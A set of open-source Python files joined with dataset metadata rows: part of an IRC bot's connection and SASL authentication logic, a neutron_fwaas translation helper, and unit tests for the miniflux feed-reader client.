if not self.callbacks:
log.critical('No callbacks in %s.', self)
now = time.time()
msg = None
if self.fastqueue:
msg = self.fastqueue.dequeue()
elif self.queue:
if now-self.lastTake <= conf.supybot.protocols.irc.throttleTime():
log.debug('Irc.takeMsg throttling.')
else:
self.lastTake = now
msg = self.queue.dequeue()
elif self.afterConnect and \
conf.supybot.protocols.irc.ping() and \
now > self.lastping + conf.supybot.protocols.irc.ping.interval():
if self.outstandingPing:
s = 'Ping sent at %s not replied to.' % \
log.timestamp(self.lastping)
log.warning(s)
self.feedMsg(ircmsgs.error(s))
self.driver.reconnect()
elif not self.zombie:
self.lastping = now
now = str(int(now))
self.outstandingPing = True
self.queueMsg(ircmsgs.ping(now))
if msg:
for callback in reversed(self.callbacks):
msg = callback.outFilter(self, msg)
if msg is None:
log.debug('%s.outFilter returned None.', callback.name())
return self.takeMsg()
world.debugFlush()
if len(str(msg)) > 512:
# Yes, this violates the contract, but at this point it doesn't
# matter. That's why we gotta go munging in private attributes
#
# I'm changing this to a log.debug to fix a possible loop in
# the LogToIrc plugin. Since users can't do anything about
# this issue, there's no fundamental reason to make it a
# warning.
log.debug('Truncating %r, message is too long.', msg)
msg._str = msg._str[:500] + '\r\n'
msg._len = len(str(msg))
# I don't think we should do this. Why should it matter? If it's
# something important, then the server will send it back to us,
# and if it's just a privmsg/notice/etc., we don't care.
# On second thought, we need this for testing.
if world.testing:
self.state.addMsg(self, msg)
log.debug('Outgoing message (%s): %s', self.network, str(msg).rstrip('\r\n'))
return msg
elif self.zombie:
# We kill the driver here so it doesn't continue to try to
# take messages from us.
self.driver.die()
self._reallyDie()
else:
return None
_numericErrorCommandRe = re.compile(r'^[45][0-9][0-9]$')
def feedMsg(self, msg):
"""Called by the IrcDriver; feeds a message received."""
msg.tag('receivedBy', self)
msg.tag('receivedOn', self.network)
msg.tag('receivedAt', time.time())
if msg.args and self.isChannel(msg.args[0]):
channel = msg.args[0]
else:
channel = None
preInFilter = str(msg).rstrip('\r\n')
log.debug('Incoming message (%s): %s', self.network, preInFilter)
# Yeah, so this is odd. Some networks (oftc) seem to give us certain
# messages with our nick instead of our prefix. We'll fix that here.
if msg.prefix == self.nick:
log.debug('Got one of those odd nick-instead-of-prefix msgs.')
msg = ircmsgs.IrcMsg(prefix=self.prefix, msg=msg)
# This catches cases where we know our own nick (from sending it to the
# server) but we don't yet know our prefix.
if msg.nick == self.nick and self.prefix != msg.prefix:
self.prefix = msg.prefix
# This keeps our nick and server attributes updated.
if msg.command in self._nickSetters:
if msg.args[0] != self.nick:
self.nick = msg.args[0]
log.debug('Updating nick attribute to %s.', self.nick)
if msg.prefix != self.server:
self.server = msg.prefix
log.debug('Updating server attribute to %s.', self.server)
# Dispatch to specific handlers for commands.
method = self.dispatchCommand(msg.command)
if method is not None:
method(msg)
elif self._numericErrorCommandRe.search(msg.command):
log.error('Unhandled error message from server: %r' % msg)
# Now update the IrcState object.
try:
self.state.addMsg(self, msg)
except:
log.exception('Exception in update of IrcState object:')
# Now call the callbacks.
world.debugFlush()
for callback in self.callbacks:
try:
m = callback.inFilter(self, msg)
if not m:
log.debug('%s.inFilter returned None', callback.name())
return
msg = m
except:
log.exception('Uncaught exception in inFilter:')
world.debugFlush()
postInFilter = str(msg).rstrip('\r\n')
if postInFilter != preInFilter:
log.debug('Incoming message (post-inFilter): %s', postInFilter)
for callback in self.callbacks:
try:
if callback is not None:
callback(self, msg)
except:
log.exception('Uncaught exception in callback:')
world.debugFlush()
def die(self):
"""Makes the Irc object *promise* to die -- but it won't die (of its
own volition) until all its queues are clear. Isn't that cool?"""
self.zombie = True
if not self.afterConnect:
self._reallyDie()
# This is useless because it's in world.ircs, so it won't be deleted until
# the program exits. Just figured you might want to know.
#def __del__(self):
# self._reallyDie()
def reset(self):
"""Resets the Irc object. Called when the driver reconnects."""
self._setNonResettingVariables()
self.state.reset()
self.queue.reset()
self.fastqueue.reset()
self.startedSync.clear()
for callback in self.callbacks:
callback.reset()
self._queueConnectMessages()
def _setNonResettingVariables(self):
# Configuration stuff.
network_config = conf.supybot.networks.get(self.network)
def get_value(name):
return getattr(network_config, name)() or \
getattr(conf.supybot, name)()
self.nick = get_value('nick')
self.user = get_value('user')
self.ident = get_value('ident')
self.alternateNicks = conf.supybot.nick.alternates()[:]
self.password = network_config.password()
self.prefix = '%s!%s@%s' % (self.nick, self.ident, 'unset.domain')
# The rest.
self.lastTake = 0
self.server = 'unset'
self.afterConnect = False
self.startedAt = time.time()
self.lastping = time.time()
self.outstandingPing = False
self.capNegociationEnded = False
self.requireStarttls = not network_config.ssl() and \
network_config.requireStarttls()
self.resetSasl()
def resetSasl(self):
network_config = conf.supybot.networks.get(self.network)
self.sasl_authenticated = False
self.sasl_username = network_config.sasl.username()
self.sasl_password = network_config.sasl.password()
self.sasl_ecdsa_key = network_config.sasl.ecdsa_key()
self.authenticate_decoder = None
self.sasl_next_mechanisms = []
self.sasl_current_mechanism = None
for mechanism in network_config.sasl.mechanisms():
if mechanism == 'ecdsa-nist256p-challenge' and \
ecdsa and self.sasl_username and self.sasl_ecdsa_key:
self.sasl_next_mechanisms.append(mechanism)
elif mechanism == 'external' and (
network_config.certfile() or
conf.supybot.protocols.irc.certfile()):
self.sasl_next_mechanisms.append(mechanism)
elif mechanism == 'plain' and \
self.sasl_username and self.sasl_password:
self.sasl_next_mechanisms.append(mechanism)
if self.sasl_next_mechanisms:
self.REQUEST_CAPABILITIES.add('sasl')
REQUEST_CAPABILITIES = set(['account-notify', 'extended-join',
'multi-prefix', 'metadata-notify', 'account-tag',
'userhost-in-names', 'invite-notify', 'server-time',
'chghost', 'batch', 'away-notify'])
def _queueConnectMessages(self):
if self.zombie:
self.driver.die()
self._reallyDie()
return
self.sendMsg(ircmsgs.IrcMsg(command='CAP', args=('LS', '302')))
if self.requireStarttls:
self.sendMsg(ircmsgs.IrcMsg(command='STARTTLS'))
else:
self.sendAuthenticationMessages()
def do670(self, irc, msg):
"""STARTTLS accepted."""
log.info('%s: Starting TLS session.', self.network)
self.requireStarttls = False
self.driver.starttls()
self.sendAuthenticationMessages()
def do691(self, irc, msg):
"""STARTTLS refused."""
log.error('%s: Server refused STARTTLS: %s', self.network, msg.args[0])
self.feedMsg(ircmsgs.error('STARTTLS upgrade refused by the server'))
self.driver.reconnect()
def sendAuthenticationMessages(self):
# Notes:
# * using sendMsg instead of queueMsg because these messages cannot
# be throttled.
if self.password:
log.info('%s: Queuing PASS command, not logging the password.',
self.network)
self.sendMsg(ircmsgs.password(self.password))
log.debug('%s: Sending NICK command, nick is %s.',
self.network, self.nick)
self.sendMsg(ircmsgs.nick(self.nick))
log.debug('%s: Sending USER command, ident is %s, user is %s.',
self.network, self.ident, self.user)
self.sendMsg(ircmsgs.user(self.ident, self.user))
def endCapabilityNegociation(self):
if not self.capNegociationEnded:
self.capNegociationEnded = True
self.sendMsg(ircmsgs.IrcMsg(command='CAP', args=('END',)))
def sendSaslString(self, string):
for chunk in ircutils.authenticate_generator(string):
self.sendMsg(ircmsgs.IrcMsg(command='AUTHENTICATE',
args=(chunk,)))
def tryNextSaslMechanism(self):
if self.sasl_next_mechanisms:
self.sasl_current_mechanism = self.sasl_next_mechanisms.pop(0)
self.sendMsg(ircmsgs.IrcMsg(command='AUTHENTICATE',
args=(self.sasl_current_mechanism.upper(),)))
else:
self.sasl_current_mechanism = None
self.endCapabilityNegociation()
def filterSaslMechanisms(self, available):
available = set(map(str.lower, available))
self.sasl_next_mechanisms = [
x for x in self.sasl_next_mechanisms
if x.lower() in available]
def doAuthenticate(self, msg):
if not self.authenticate_decoder:
self.authenticate_decoder = ircutils.AuthenticateDecoder()
self.authenticate_decoder.feed(msg)
if not self.authenticate_decoder.ready:
return # Waiting for other messages
string = self.authenticate_decoder.get()
self.authenticate_decoder = None
mechanism = self.sasl_current_mechanism
if mechanism == 'ecdsa-nist256p-challenge':
if string == b'':
self.sendSaslString(self.sasl_username.encode('utf-8'))
return
try:
with open(self.sasl_ecdsa_key) as fd:
private_key = SigningKey.from_pem(fd.read())
authstring = private_key.sign(base64.b64decode(msg.args[0].encode()))
self.sendSaslString(authstring)
except (BadDigestError, OSError, ValueError):
self.sendMsg(ircmsgs.IrcMsg(command='AUTHENTICATE',
args=('*',)))
self.tryNextSaslMechanism()
elif mechanism == 'external':
self.sendSaslString(b'')
elif mechanism == 'plain':
authstring = b'\0'.join([
self.sasl_username.encode('utf-8'),
self.sasl_username.encode('utf-8'),
self.sasl_password.encode('utf-8'),
])
self.sendSaslString(authstring)
def do903(self, msg):
log.info('%s: SASL authentication successful', self.network)
self.sasl_authenticated = True
self.endCapabilityNegociation()
def do904(self, msg):
log.warning('%s: SASL authentication failed', self.network)
self.tryNextSaslMechanism()
def do905(self, msg):
log.warning('%s: SASL authentication failed because the username or '
'password is too long.', self.network)
self.tryNextSaslMechanism()
def do906(self, msg):
log.warning('%s: SASL authentication aborted', self.network)
self.tryNextSaslMechanism()
def do907(self, msg):
log.warning('%s: Attempted SASL authentication when we were already '
'authenticated.', self.network)
self.tryNextSaslMechanism()
def do908(self, msg):
log.info('%s: Supported SASL mechanisms: %s',
self.network, msg.args[1])
self.filterSaslMechanisms(set(msg.args[1].split(',')))
def doCap(self, msg):
subcommand = msg.args[1]
if subcommand == 'ACK':
self.doCapAck(msg)
elif subcommand == 'NAK':
self.doCapNak(msg)
elif subcommand == 'LS':
self.doCapLs(msg)
elif subcommand == 'DEL':
self.doCapDel(msg)
elif subcommand == 'NEW':
self.doCapNew(msg)
def doCapAck(self, msg):
if len(msg.args) != 3:
log.warning('Bad CAP ACK from server: %r', msg)
return
caps = msg.args[2].split()
assert caps, 'Empty list of capabilities'
log.info('%s: Server acknowledged capabilities: %L',
self.network, caps)
self.state.capabilities_ack.update(caps)
if 'sasl' in caps:
self.tryNextSaslMechanism()
else:
self.endCapabilityNegociation()
def doCapNak(self, msg):
if len(msg.args) != 3:
log.warning('Bad CAP NAK from server: %r', msg)
return
caps = msg.args[2].split()
assert caps, 'Empty list of capabilities'
self.state.capabilities_nak.update(caps)
log.warning('%s: Server refused capabilities: %L',
self.network, caps)
self.endCapabilityNegociation()
def _addCapabilities(self, capstring):
for item in capstring.split():
while item.startswith(('=', '~')):
item = item[1:]
if '=' in item:
(cap, value) = item.split('=', 1)
self.state.capabilities_ls[cap] = value
else:
self.state.capabilities_ls[item] = None
def doCapLs(self, msg):
if len(msg.args) == 4:
# Multi-line LS
if msg.args[2] != '*':
log.warning('Bad CAP LS from server: %r', msg)
return
self._addCapabilities(msg.args[3])
elif len(msg.args) == 3: # End of LS
self._addCapabilities(msg.args[2])
common_supported_capabilities = set(self.state.capabilities_ls) & \
self.REQUEST_CAPABILITIES
if 'sasl' in self.state.capabilities_ls:
s = self.state.capabilities_ls['sasl']
if s is not None:
self.filterSaslMechanisms(set(s.split(',')))
if 'starttls' not in self.state.capabilities_ls and \
self.requireStarttls:
log.error('%s: Server does not support STARTTLS.', self.network)
self.feedMsg(ircmsgs.error('STARTTLS upgrade not supported '
'by the server'))
self.die()
return
# NOTE: Capabilities are requested in alphabetic order, because
# sets are unordered, and their "order" is nondeterministic.
# This is needed for the tests.
if common_supported_capabilities:
caps = ' '.join(sorted(common_supported_capabilities))
self.sendMsg(ircmsgs.IrcMsg(command='CAP',
args=('REQ', caps)))
else:
self.endCapabilityNegociation()
else:
log.warning('Bad CAP LS from server: %r', msg)
return
def doCapDel(self, msg):
if len(msg.args) != 3:
log.warning('Bad CAP DEL from server: %r', msg)
return
caps = msg.args[2].split()
assert caps, 'Empty list of capabilities'
for cap in caps:
# The spec says "If capability negotiation 3.2 was used, extensions
# listed MAY contain values." for CAP NEW and CAP DEL
cap = cap.split('=')[0]
try:
del self.state.capabilities_ls[cap]
except KeyError:
pass
try:
self.state.capabilities_ack.remove(cap)
except KeyError:
pass
def doCapNew(self, msg):
if len(msg.args) != 3:
log.warning('Bad CAP NEW from server: %r', msg)
return
caps = msg.args[2].split()
assert caps, 'Empty list of capabilities'
self._addCapabilities(msg.args[2])
if not self.sasl_authenticated and 'sasl' in self.state.capabilities_ls:
self.resetSasl()
s = self.state.capabilities_ls['sasl']
if s is not None:
self.filterSaslMechanisms(set(s.split(',')))
common_supported_unrequested_capabilities = (
set(self.state.capabilities_ls) &
self.REQUEST_CAPABILITIES -
self.state.capabilities_ack)
if common_supported_unrequested_capabilities:
caps = ' '.join(sorted(common_supported_unrequested_capabilities))
self.sendMsg(ircmsgs.IrcMsg(command='CAP',
args=('REQ', caps)))
def monitor(self, targets):
"""Increment a counter of how many callbacks monitor each target;
and send a MONITOR + to the server if the target is not yet
monitored."""
if isinstance(targets, str):
targets = [targets]
not_yet_monitored = set()
for target in targets:
if target in self.monitoring:
self.monitoring[target] += 1
else:
not_yet_monitored.add(target)
self.monitoring[target] = 1
if not_yet_monitored:
self.queueMsg(ircmsgs.monitor('+', not_yet_monitored))
return not_yet_monitored
def unmonitor(self, targets):
"""Decrements a counter of how many callbacks monitor each target;
and send a MONITOR - to the server if the counter drops to 0."""
if isinstance(targets, str):
targets = [targets]
should_be_unmonitored = set()
for target in targets:
self.monitoring[target] -= 1
if self.monitoring[target] == 0:
del self.monitoring[target]
should_be_unmonitored.add(target)
if should_be_unmonitored:
self.queueMsg(ircmsgs.monitor('-', should_be_unmonitored))
return should_be_unmonitored
def _getNextNick(self):
if self.alternateNicks:
nick = self.alternateNicks.pop(0)
if '%s' in nick:
network_nick = conf.supybot.networks.get(self.network).nick()
if network_nick == '':
nick %= conf.supybot.nick()
else:
nick %= network_nick
return nick
else:
nick = conf.supybot.nick()
network_nick = conf.supybot.networks.get(self.network).nick()
if network_nick != '':
nick = network_nick
ret = nick
L = list(nick)
while len(L) <= 3:
L.append('`')
while ircutils.strEqual(ret, nick):
L[random.randrange(len(L))] = utils.iter.choice('0123456789')
ret = ''.join(L)
return ret
def do002(self, msg):
"""Logs the ircd version."""
(beginning, version) = rsplit(msg.args[-1], maxsplit=1)
log.info('Server %s has version %s', self.server, version)
def doPing(self, msg):
"""Handles PING messages."""
self.sendMsg(ircmsgs.pong(msg.args[0]))
def doPong(self, msg):
"""Handles PONG messages."""
self.outstandingPing = False
def do376(self, msg):
log.info('Got end of MOTD from %s', self.server)
self.afterConnect = True
# Let's reset nicks in case we had to use a weird one.
self.alternateNicks = conf.supybot.nick.alternates()[:]
umodes = conf.supybot.networks.get(self.network).umodes()
if umodes == '':
umodes = conf.supybot.protocols.irc.umodes()
supported = self.state.supported.get('umodes')
if supported:
acceptedchars = supported.union('+-')
umodes = ''.join([m for m in umodes if m in acceptedchars])
if umodes:
log.info('Sending user modes to %s: %s', self.network, umodes)
self.sendMsg(ircmsgs.mode(self.nick, umodes))
do377 = do422 = do376
def do43x(self, msg, problem):
if not self.afterConnect:
newNick = self._getNextNick()
assert newNick != self.nick
log.info('Got %s: %s %s. Trying %s.',
msg.command, self.nick, problem, newNick)
self.sendMsg(ircmsgs.nick(newNick))
def do437(self, msg):
self.do43x(msg, 'is temporarily unavailable')
def do433(self, msg):
self.do43x(msg, 'is in use')
def do432(self, msg):
self.do43x(msg, 'is not a valid nickname')
def doJoin(self, msg):
if msg.nick == self.nick:
channel = msg.args[0]
self.queueMsg(ircmsgs.who(channel, args=('%tuhna,1',))) # Ends with 315.
self.queueMsg(ircmsgs.mode(channel)) # Ends with 329.
for channel in msg.args[0].split(','):
self.queueMsg(ircmsgs.mode(channel, '+b'))
self.startedSync[channel] = time.time()
def do315(self, msg):
channel = msg.args[1]
if channel in self.startedSync:
now = time.time()
started = self.startedSync.pop(channel)
elapsed = now - started
log.info('Join to %s on %s synced in %.2f seconds.',
channel, self.network, elapsed)
def doError(self, msg):
"""Handles ERROR messages."""
log.warning('Error message from %s: %s', self.network, msg.args[0])
if not self.zombie:
if msg.args[0].lower().startswith('closing link'):
self.driver.reconnect()
elif 'too fast' in msg.args[0]: # Connecting too fast.
self.driver.reconnect(wait=True)
def doNick(self, msg):
"""Handles NICK messages."""
if msg.nick == self.nick:
newNick = msg.args[0]
self.nick = newNick
(nick, user, domain) = ircutils.splitHostmask(msg.prefix)
self.prefix = ircutils.joinHostmask(self.nick, user, domain)
elif conf.supybot.followIdentificationThroughNickChanges():
# We use elif here because this means it's someone else's nick
# change, not our own.
try:
id = ircdb.users.getUserId(msg.prefix)
u = ircdb.users.getUser(id)
except KeyError:
return
if u.auth:
(_, user, host) = ircutils.splitHostmask(msg.prefix)
newhostmask = ircutils.joinHostmask(msg.args[0], user, host)
for (i, (when, authmask)) in enumerate(u.auth[:]):
if ircutils.strEqual(msg.prefix, authmask):
log.info('Following identification for %s: %s -> %s',
u.name, authmask, newhostmask)
u.auth[i] = (u.auth[i][0], newhostmask)
ircdb.users.setUser(u)
def _reallyDie(self):
"""Makes the Irc object die. Dead."""
log.info('Irc object for %s dying.', self.network)
# XXX This hasattr should be removed, I'm just putting it here because
# we're so close to a release. After 0.80.0 we should remove this
# and fix whatever AttributeErrors arise in the drivers themselves.
if self.driver is not None and hasattr(self.driver, 'die'):
self.driver.die()
if self in world.ircs:
world.ircs.remove(self)
# Only kill the callbacks if we're the last Irc.
if not world.ircs:
for cb in self.callbacks:
cb.die()
# If we shared our list of callbacks, this ensures that
# cb.die() is only called once for each callback. It's
# not really necessary since we already check to make sure
# we're the only Irc object, but a little robustitude never
# hurt anybody.
log.debug('Last Irc, clearing callbacks.')
self.callbacks[:] = []
else:
log.warning('Irc object killed twice: %s', utils.stackTrace())
def __hash__(self):
return id(self)
def __eq__(self, other):
# We check isinstance here, so that if some proxy object (like those
# defined in callbacks.py) has overridden __eq__, it takes precedence.
if isinstance(other, self.__class__):
return id(self) == id(other)
else:
return other.__eq__(self)
def __ne__(self, other):
return not (self == other)
def __str__(self):
return 'Irc object for %s' % self.network
def __repr__(self):
return '<irclib.Irc object for %s>' % self.network
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| 38.595075 | 89 | 0.569791 |
e28f5752220298bd5700ddb11e2e0387bfcef44f | 1,055 | py | Python | neutron_fwaas/_i18n.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | 1 | 2019-03-18T08:55:55.000Z | 2019-03-18T08:55:55.000Z | neutron_fwaas/_i18n.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/_i18n.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import oslo_i18n
DOMAIN = "neutron_fwaas"
_translators = oslo_i18n.TranslatorFactory(domain=DOMAIN)
# The primary translation function using the well-known name "_"
_ = _translators.primary
# The contextual translation function using the name "_C"
_C = _translators.contextual_form
# The plural translation function using the name "_P"
_P = _translators.plural_form
def get_available_languages():
return oslo_i18n.get_available_languages(DOMAIN)
| 31.969697 | 78 | 0.758294 |
20a3a4a6159570926de6c0b986c4973c77ca93f9 | 28,800 | py | Python | tests/test_client.py | miniflux/python-client | 5eef3e5d86b94c19b3fb52b1ec1190cf6f12c719 | [
"MIT"
] | 25 | 2019-08-15T19:08:57.000Z | 2022-03-17T13:21:07.000Z | tests/test_client.py | miniflux/python-client | 5eef3e5d86b94c19b3fb52b1ec1190cf6f12c719 | [
"MIT"
] | null | null | null | tests/test_client.py | miniflux/python-client | 5eef3e5d86b94c19b3fb52b1ec1190cf6f12c719 | [
"MIT"
] | 2 | 2020-07-15T00:06:26.000Z | 2021-11-11T13:29:14.000Z | # The MIT License (MIT)
#
# Copyright (c) 2018-2020 Frederic Guillot
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import json
import time
import unittest
from unittest import mock
import miniflux
from miniflux import ClientError
from requests.exceptions import Timeout
class TestMinifluxClient(unittest.TestCase):
def test_get_error_reason(self):
response = mock.Mock()
response.status_code = 404
response.json.return_value = {'error_message': 'some error'}
error = ClientError(response)
self.assertEqual(error.status_code, 404)
self.assertEqual(error.get_error_reason(), 'some error')
def test_get_error_without_reason(self):
response = mock.Mock()
response.status_code = 404
response.json.return_value = {}
error = ClientError(response)
self.assertEqual(error.status_code, 404)
self.assertEqual(error.get_error_reason(), 'status_code=404')
def test_get_error_with_bad_response(self):
response = mock.Mock()
response.status_code = 404
response.json.return_value = None
error = ClientError(response)
self.assertEqual(error.status_code, 404)
self.assertEqual(error.get_error_reason(), 'status_code=404')
def test_base_url_with_trailing_slash(self):
requests = _get_request_mock()
expected_result = [{"url": "http://example.org/feed", "title": "Example", "type": "RSS"}]
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost/", "username", "password")
result = client.discover("http://example.org/")
requests.post.assert_called_once_with('http://localhost/v1/discover',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
self.assertEqual(result, expected_result)
def test_get_me(self):
requests = _get_request_mock()
expected_result = {"id": 123, "username": "foobar"}
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.me()
requests.get.assert_called_once_with('http://localhost/v1/me',
headers=None,
auth=('username', 'password'),
timeout=30)
self.assertEqual(result, expected_result)
def test_get_me_with_server_error(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 500
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
with self.assertRaises(ClientError):
client.me()
def test_discover(self):
requests = _get_request_mock()
expected_result = [{"url": "http://example.org/feed", "title": "Example", "type": "RSS"}]
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.discover("http://example.org/")
requests.post.assert_called_once_with('http://localhost/v1/discover',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('url'), "http://example.org/")
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertEqual(result, expected_result)
def test_discover_with_credentials(self):
requests = _get_request_mock()
expected_result = [{"url": "http://example.org/feed", "title": "Example", "type": "RSS"}]
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.discover("http://example.org/", username="foobar", password="secret", user_agent="Bot")
requests.post.assert_called_once_with('http://localhost/v1/discover',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('url'), "http://example.org/")
self.assertEqual(payload.get('username'), "foobar")
self.assertEqual(payload.get('password'), "secret")
self.assertEqual(payload.get('user_agent'), "Bot")
self.assertEqual(result, expected_result)
def test_discover_with_server_error(self):
requests = _get_request_mock()
expected_result = {'error_message': 'some error'}
response = mock.Mock()
response.status_code = 500
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
with self.assertRaises(ClientError):
client.discover("http://example.org/")
def test_export(self):
requests = _get_request_mock()
expected_result = "OPML feed"
response = mock.Mock()
response.status_code = 200
response.text = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.export()
requests.get.assert_called_once_with('http://localhost/v1/export',
headers=None,
auth=('username', 'password'),
timeout=30)
self.assertEqual(result, expected_result)
def test_import(self):
requests = _get_request_mock()
input_data = "my opml data"
response = mock.Mock()
response.status_code = 201
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
client.import_feeds(input_data)
requests.post.assert_called_once_with('http://localhost/v1/import',
headers=None,
data=input_data,
auth=('username', 'password'),
timeout=30)
def test_import_failure(self):
requests = _get_request_mock()
input_data = "my opml data"
response = mock.Mock()
response.status_code = 500
response.json.return_value = {"error_message": "random error"}
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
with self.assertRaises(ClientError):
client.import_feeds(input_data)
requests.post.assert_called_once_with('http://localhost/v1/import',
headers=None,
data=input_data,
auth=('username', 'password'),
timeout=30)
def test_get_feed(self):
requests = _get_request_mock()
expected_result = {"id": 123, "title": "Example"}
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_feed(123)
requests.get.assert_called_once_with('http://localhost/v1/feeds/123',
headers=None,
auth=('username', 'password'),
timeout=30)
self.assertEqual(result, expected_result)
def test_create_feed(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123)
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertIsNone(payload.get('crawler'))
self.assertEqual(result, expected_result['feed_id'])
def test_create_feed_with_credentials(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123, username="foobar", password="secret")
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertEqual(payload.get('username'), "foobar")
self.assertEqual(payload.get('password'), "secret")
self.assertIsNone(payload.get('crawler'))
self.assertEqual(result, expected_result['feed_id'])
def test_create_feed_with_crawler_enabled(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123, crawler=True)
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertTrue(payload.get('crawler'))
self.assertEqual(result, expected_result['feed_id'])
def test_create_feed_with_custom_user_agent_and_crawler_disabled(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123, crawler=False, user_agent="GoogleBot")
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertFalse(payload.get('crawler'))
self.assertEqual(payload.get('user_agent'), "GoogleBot")
self.assertEqual(result, expected_result['feed_id'])
def test_update_feed(self):
requests = _get_request_mock()
expected_result = {"id": 123, "crawler": True, "username": "test"}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.update_feed(123, crawler=True, username="test")
requests.put.assert_called_once_with('http://localhost/v1/feeds/123',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.put.call_args
payload = json.loads(kwargs.get('data'))
self.assertNotIn('feed_url', payload)
self.assertNotIn('category_id', payload)
self.assertEqual(payload.get('username'), "test")
self.assertTrue(payload.get('crawler'))
self.assertEqual(result, expected_result)
def test_refresh_all_feeds(self):
requests = _get_request_mock()
expected_result = True
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
